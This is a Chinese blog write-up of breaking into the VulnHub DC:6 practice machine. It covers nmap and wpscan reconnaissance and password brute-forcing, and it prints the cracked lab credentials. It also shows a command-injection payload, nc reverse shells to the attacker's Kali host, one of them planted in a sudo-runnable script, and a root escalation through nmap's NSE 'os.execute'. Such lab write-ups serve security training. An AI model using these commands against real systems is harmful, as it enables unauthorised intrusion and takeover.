vulnhub-DC:6靶机渗透记录

准备工作

在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub

导入到vmware,设置成NAT模式

打开kali准备进行渗透(ip:192.168.200.6)

 

信息收集

 利用nmap进行ip端口探测

nmap -sS 192.168.200.6/24 

 探测到ip为192.168.200.17的靶机,开放了80端口和22端口

再用nmap对所有端口进行探测,确保没有别的遗漏信息  

nmap -sV -p- 192.168.200.17

 

先看看80端口,一直打不开,重定向到了wordy,像DC:2的方法一样操作,修改host文件

vi /etc/hosts

 和dc:2的界面一模一样框架也是 WordPress

 

 dirsearch扫描也扫到了/wp-login.php后台登陆页面

 

 接下来和dc:2的操作基本一致

 

wpscan扫描

使用kali自带的工具wpscan(wordpress框架专门的漏洞扫描工具)列举出所有用户  

wpscan --url http://wordy/ -e u 

 

 爆出五个用户 admin、jens、graham、mark、sarah,保存下来待会进行爆破

但是用了很多字典都爆破不出来,不知道怎么办的时候才发现在下载地址处的最下面给了线索DC: 6 ~ VulnHub

 

先cd到/usr/share/wordlists/这个目录,因为rockyou这个文件没有解压不能直接打开

gunzip rockyou.txt.gz  

 再返回桌面执行作者给的命令

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

直接使用wordy进行爆破

wpscan --url http://wordy/ -U user -P passwords.txt

 爆到用户名mark 密码helpdesk01

 

nc反弹shell

 登陆到刚刚的后台页面,在这里找到了命令执行的地方,试了一下127.0.0.1|ls 发现有漏洞可以执行任意命令,那就可以反弹shell到kali上

 

使用nc反弹shell,但是那个框有字数限制,用bp抓一下再放出去就解决了

nc -e /bin/bash 192.168.200.6 9999 

再使用python 通过pty.spawn()获得交互式shell

python -c'import pty;pty.spawn("/bin/bash")'

 

 

root没有权限进不去,但是在home里发现了四个用户,在mark用户发现了一个txt文件,里面有graham的密码 GSo7isUM1D4

 

 使用su切换成graham,看看graham的权限

发现jens下的backups.sh可以不用密码执行,可以用来获取jens的权限

这里有两种方法第一种是写入/bin/bash/,然后以jens的用户来执行文件直接获取权限

这里我记录第二种方法,写入nc命令,然后在另一端监听nc -lvf 9999,最后在以jens用户执行sh文件,再使用python 通过pty.spawn()获得交互式shell,两种方法思路都差不多

 

echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh 

sudo -u jens /home/jens/backups.sh

python -c'import pty;pty.spawn("/bin/bash")'

 

 

在看看jens的权限sudo -l

发现root权限namp无需密码,利用这个文件提权

 

权限提升

namp有执行脚本的功能,那就可以写一个执行bash的脚本文件,通过namp执行来提权

echo 'os.execute("/bin/sh")' > getroot.nse   //nes脚本后缀

sudo nmap --script=/home/jens/getroot.nse //namp执行

 

DONE 

 

参考文章

靶机DC-6_sm1rk的博客-CSDN博客

 

posted @ 2021-08-04 16:05  1_Ry  阅读(292)  评论(0编辑  收藏  举报